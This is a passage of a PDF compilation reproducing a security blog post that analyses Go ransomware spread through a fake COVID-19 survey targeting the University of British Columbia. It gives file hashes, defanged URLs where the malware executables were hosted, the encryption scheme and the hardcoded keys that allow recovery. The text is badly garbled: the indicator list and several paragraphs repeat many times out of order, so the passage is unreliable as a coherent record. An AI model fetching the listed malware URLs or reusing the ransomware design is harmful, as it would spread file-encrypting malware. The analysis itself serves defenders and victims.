3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3193 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3194 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3195 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3196 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3197 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3198 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3199 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3200 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3201 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3202 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3203 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3204 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3205 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3206 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3207 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3208 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3209 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3210 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3211 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3212 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3213 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3214 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3215 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3216 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3217 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3218 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3219 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3220 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3221 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3222 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3223 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3224 of 